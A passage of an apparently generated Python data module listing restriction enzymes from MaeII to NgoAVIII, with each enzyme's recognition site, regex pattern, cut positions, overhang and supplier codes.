'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['MaeII'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GTNAC'),
'compsite': '(?=(?P<MaeIII>GT.AC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['MaeIII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GATC'),
'compsite': '(?=(?P<MalI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['MalI'] = _temp()
def _temp():
return {
'charac': (28, 19, None, None, 'CRTTGAC'),
'compsite': '(?=(?P<MaqI>C[AG]TTGAC))|(?=(?P<MaqI_as>GTCAA[CT]G))',
'dna': None,
'freq': 8192.0,
'fst3': 19,
'fst5': 28,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTTGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MaqI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCGCGCG'),
'compsite': '(?=(?P<MauBI>CGCGCGCG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCGCGCG',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MauBI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGGCGA'),
'compsite': '(?=(?P<Mba11I>AGGCGA))|(?=(?P<Mba11I_as>TCGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Mba11I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CCGCTC'),
'compsite': '(?=(?P<MbiI>CCGCTC))|(?=(?P<MbiI_as>GAGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MbiI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<MboI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'K', 'N', 'Q', 'R', 'X', 'Y'),
}
rest_dict['MboI'] = _temp()
def _temp():
return {
'charac': (13, 7, None, None, 'GAAGA'),
'compsite': '(?=(?P<MboII>GAAGA))|(?=(?P<MboII_as>TCTTC))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGA',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'N', 'Q', 'R', 'V', 'X'),
}
rest_dict['MboII'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GCGCGC'),
'compsite': '(?=(?P<McaTI>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['McaTI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGNNNNNCTC'),
'compsite': '(?=(?P<Mcr10I>GAAG.....CTC))|(?=(?P<Mcr10I_as>GAG.....CTTC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGNNNNNCTC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Mcr10I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGRYCG'),
'compsite': '(?=(?P<McrI>CG[AG][CT]CG))',
'dna': None,
'freq': 1024.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'RY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRYCG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['McrI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CAATTG'),
'compsite': '(?=(?P<MfeI>CAATTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAATTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['MfeI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<MflI>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['MflI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GDGCHC'),
'compsite': '(?=(?P<MhlI>G[AGT]GC[ACT]C))',
'dna': None,
'freq': 455.1111111111111,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'DGCH',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GDGCHC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['MhlI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTNNAC'),
'compsite': '(?=(?P<MjaIV>GT..AC))',
'dna': None,
'freq': 256.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNNAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MjaIV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGAYGT'),
'compsite': '(?=(?P<MkaDII>GAGA[CT]GT))|(?=(?P<MkaDII_as>AC[AG]TCTC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGAYGT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MkaDII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<MlsI>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MlsI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCCCA'),
'compsite': '(?=(?P<Mlu211III>AGCCCA))|(?=(?P<Mlu211III_as>TGGGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Mlu211III'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<MluCI>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['MluCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGCGT'),
'compsite': '(?=(?P<MluI>ACGCGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGCGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['MluI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<MluNI>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['MluNI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCGCC'),
'compsite': '(?=(?P<Mly113I>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Mly113I'] = _temp()
def _temp():
return {
'charac': (10, 5, None, None, 'GAGTC'),
'compsite': '(?=(?P<MlyI>GAGTC))|(?=(?P<MlyI_as>GACTC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['MlyI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'TCCRAC'),
'compsite': '(?=(?P<MmeI>TCC[AG]AC))|(?=(?P<MmeI_as>GT[CT]GGA))',
'dna': None,
'freq': 2048.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCRAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N', 'X'),
}
rest_dict['MmeI'] = _temp()
def _temp():
return {
'charac': (11, 6, None, None, 'CCTC'),
'compsite': '(?=(?P<MnlI>CCTC))|(?=(?P<MnlI_as>GAGG))',
'dna': None,
'freq': 256.0,
'fst3': 6,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'Q', 'V', 'X'),
}
rest_dict['MnlI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<Mox20I>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Mox20I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'ATGCAT'),
'compsite': '(?=(?P<Mph1103I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Mph1103I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCCGGCG'),
'compsite': '(?=(?P<MreI>CGCCGGCG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCGGCG',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MreI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<MroI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'O'),
}
rest_dict['MroI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCCGGC'),
'compsite': '(?=(?P<MroNI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['MroNI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<MroXI>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['MroXI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<MscI>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N', 'O'),
}
rest_dict['MscI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TTAA'),
'compsite': '(?=(?P<MseI>TTAA))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTAA',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['MseI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CAYNNNNRTG'),
'compsite': '(?=(?P<MslI>CA[CT]....[AG]TG))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAYNNNNRTG',
'size': 10,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['MslI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGGCCA'),
'compsite': '(?=(?P<Msp20I>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['Msp20I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CMGCKG'),
'compsite': '(?=(?P<MspA1I>C[AC]GC[GT]G))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CMGCKG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'R', 'V'),
}
rest_dict['MspA1I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<MspCI>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['MspCI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCCGGC'),
'compsite': '(?=(?P<MspGI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MspGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<MspI>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'N', 'Q', 'R', 'V', 'X'),
}
rest_dict['MspI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACGRAG'),
'compsite': '(?=(?P<MspI7II>ACG[AG]AG))|(?=(?P<MspI7II_as>CT[CT]CGT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MspI7II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCMGAAG'),
'compsite': '(?=(?P<MspI7IV>GC[AC]GAAG))|(?=(?P<MspI7IV_as>CTTC[GT]GC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCMGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MspI7IV'] = _temp()
def _temp():
return {
'charac': (13, 13, None, None, 'CNNR'),
'compsite': '(?=(?P<MspJI>C..[AG]))|(?=(?P<MspJI_as>[CT]..G))',
'dna': None,
'freq': 8.0,
'fst3': 13,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CNNR',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['MspJI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCNGG'),
'compsite': '(?=(?P<MspR9I>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['MspR9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGCGAC'),
'compsite': '(?=(?P<MspSC27II>CCGCGAC))|(?=(?P<MspSC27II_as>GTCGCGG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MspSC27II'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GTTTAAAC'),
'compsite': '(?=(?P<MssI>GTTTAAAC))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTTAAAC',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MssI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGCGCA'),
'compsite': '(?=(?P<MstI>TGCGCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MstI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GCGCNGCGC'),
'compsite': '(?=(?P<MteI>GCGC.GCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCNGCGC',
'size': 9,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['MteI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACGCAG'),
'compsite': '(?=(?P<MtuHN878II>CACGCAG))|(?=(?P<MtuHN878II_as>CTGCGTG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MtuHN878II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CAATTG'),
'compsite': '(?=(?P<MunI>CAATTG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAATTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K', 'M', 'S'),
}
rest_dict['MunI'] = _temp()
def _temp():
return {
'charac': (7, -1, None, None, 'GAATGC'),
'compsite': '(?=(?P<Mva1269I>GAATGC))|(?=(?P<Mva1269I_as>GCATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Mva1269I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<MvaI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'M'),
}
rest_dict['MvaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<MvnI>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['MvnI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GCNNNNNNNGC'),
'compsite': '(?=(?P<MwoI>GC.......GC))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNNNNNNNGC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['MwoI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCCGGC'),
'compsite': '(?=(?P<NaeI>GCCGGC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'K', 'N'),
}
rest_dict['NaeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCAGC'),
'compsite': '(?=(?P<Nal45188II>ACCAGC))|(?=(?P<Nal45188II_as>GCTGGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Nal45188II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCGCC'),
'compsite': '(?=(?P<NarI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'M', 'N', 'Q', 'R', 'X'),
}
rest_dict['NarI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCGAC'),
'compsite': '(?=(?P<Nbr128II>ACCGAC))|(?=(?P<Nbr128II_as>GTCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Nbr128II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<NciI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('J', 'N', 'R'),
}
rest_dict['NciI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCATGG'),
'compsite': '(?=(?P<NcoI>CCATGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCATGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X', 'Y'),
}
rest_dict['NcoI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CATATG'),
'compsite': '(?=(?P<NdeI>CATATG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'),
}
rest_dict['NdeI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<NdeII>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('J', 'M'),
}
rest_dict['NdeII'] = _temp()
def _temp():
return {
'charac': (12, 7, None, None, 'GCCGC'),
'compsite': '(?=(?P<NgoAVII>GCCGC))|(?=(?P<NgoAVII_as>GCGGC))',
'dna': None,
'freq': 1024.0,
'fst3': 7,
'fst5': 12,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['NgoAVII'] = _temp()
def _temp():
return {
'charac': (-12, -25, 24, 11, 'GACNNNNNTGA'),
'compsite': '(?=(?P<NgoAVIII>GAC.....TGA))|(?=(?P<NgoAVIII_as>TCA.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -25,
'fst5': -12,
